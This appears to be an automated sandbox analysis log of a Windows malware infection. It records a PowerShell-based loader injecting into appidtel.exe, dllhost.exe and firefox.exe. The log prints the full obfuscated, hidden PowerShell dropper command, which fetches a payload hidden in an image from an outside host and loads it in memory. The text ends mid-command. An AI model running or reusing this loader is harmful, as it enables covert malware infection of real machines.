              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h]5_2_0323F7BA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FF78A mov eax, dword ptr fs:[00000030h]5_2_032FF78A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324D7E0 mov ecx, dword ptr fs:[00000030h]5_2_0324D7E0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032627ED mov eax, dword ptr fs:[00000030h]5_2_032627ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032627ED mov eax, dword ptr fs:[00000030h]5_2_032627ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032627ED mov eax, dword ptr fs:[00000030h]5_2_032627ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CE7E1 mov eax, dword ptr fs:[00000030h]5_2_032CE7E1
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032447FB mov eax, dword ptr fs:[00000030h]5_2_032447FB
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032447FB mov eax, dword ptr fs:[00000030h]5_2_032447FB
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324C7C0 mov eax, dword ptr fs:[00000030h]5_2_0324C7C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032457C0 mov eax, dword ptr fs:[00000030h]5_2_032457C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032457C0 mov eax, dword ptr fs:[00000030h]5_2_032457C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032457C0 mov eax, dword ptr fs:[00000030h]5_2_032457C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C07C3 mov eax, dword ptr fs:[00000030h]5_2_032C07C3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E627 mov eax, dword ptr fs:[00000030h]5_2_0325E627
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h]5_2_0323F626
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03276620 mov eax, dword ptr fs:[00000030h]5_2_03276620
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03315636 mov eax, dword ptr fs:[00000030h]5_2_03315636
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03278620 mov eax, dword ptr fs:[00000030h]5_2_03278620
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324262C mov eax, dword ptr fs:[00000030h]5_2_0324262C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03271607 mov eax, dword ptr fs:[00000030h]5_2_03271607
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BE609 mov eax, dword ptr fs:[00000030h]5_2_032BE609
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327F603 mov eax, dword ptr fs:[00000030h]5_2_0327F603
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325260B mov eax, dword ptr fs:[00000030h]5_2_0325260B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325260B mov eax, dword ptr fs:[00000030h]5_2_0325260B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325260B mov eax, dword ptr fs:[00000030h]5_2_0325260B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325260B mov eax, dword ptr fs:[00000030h]5_2_0325260B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325260B mov eax, dword ptr fs:[00000030h]5_2_0325260B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325260B mov eax, dword ptr fs:[00000030h]5_2_0325260B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325260B mov eax, dword ptr fs:[00000030h]5_2_0325260B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03282619 mov eax, dword ptr fs:[00000030h]5_2_03282619
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03243616 mov eax, dword ptr fs:[00000030h]5_2_03243616
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03243616 mov eax, dword ptr fs:[00000030h]5_2_03243616
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327A660 mov eax, dword ptr fs:[00000030h]5_2_0327A660
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327A660 mov eax, dword ptr fs:[00000030h]5_2_0327A660
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03279660 mov eax, dword ptr fs:[00000030h]5_2_03279660
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03279660 mov eax, dword ptr fs:[00000030h]5_2_03279660
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03272674 mov eax, dword ptr fs:[00000030h]5_2_03272674
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330866E mov eax, dword ptr fs:[00000030h]5_2_0330866E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330866E mov eax, dword ptr fs:[00000030h]5_2_0330866E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325C640 mov eax, dword ptr fs:[00000030h]5_2_0325C640
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327C6A6 mov eax, dword ptr fs:[00000030h]5_2_0327C6A6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323D6AA mov eax, dword ptr fs:[00000030h]5_2_0323D6AA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323D6AA mov eax, dword ptr fs:[00000030h]5_2_0323D6AA
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032376B2 mov eax, dword ptr fs:[00000030h]5_2_032376B2
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032376B2 mov eax, dword ptr fs:[00000030h]5_2_032376B2
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032376B2 mov eax, dword ptr fs:[00000030h]5_2_032376B2
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032766B0 mov eax, dword ptr fs:[00000030h]5_2_032766B0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C368C mov eax, dword ptr fs:[00000030h]5_2_032C368C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C368C mov eax, dword ptr fs:[00000030h]5_2_032C368C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C368C mov eax, dword ptr fs:[00000030h]5_2_032C368C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C368C mov eax, dword ptr fs:[00000030h]5_2_032C368C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03244690 mov eax, dword ptr fs:[00000030h]5_2_03244690
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03244690 mov eax, dword ptr fs:[00000030h]5_2_03244690
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h]5_2_032D36EE
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h]5_2_032D36EE
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h]5_2_032D36EE
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h]5_2_032D36EE
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h]5_2_032D36EE
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h]5_2_032D36EE
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326D6E0 mov eax, dword ptr fs:[00000030h]5_2_0326D6E0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326D6E0 mov eax, dword ptr fs:[00000030h]5_2_0326D6E0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032736EF mov eax, dword ptr fs:[00000030h]5_2_032736EF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BE6F2 mov eax, dword ptr fs:[00000030h]5_2_032BE6F2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: amsi64_1492.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtClose: Direct from: 0x77382B6C
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeNtClose: Direct from: 0x77377B2E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\appidtel.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\appidtel.exeSection loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeSection loaded: NULL target: C:\Windows\SysWOW64\appidtel.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeSection loaded: NULL target: C:\Windows\SysWOW64\dllhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeThread register set: target process: 4140Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeThread APC queued: target process: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\appidtel.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\appidtel.exe base: 401000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\appidtel.exe base: 8DE008Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = 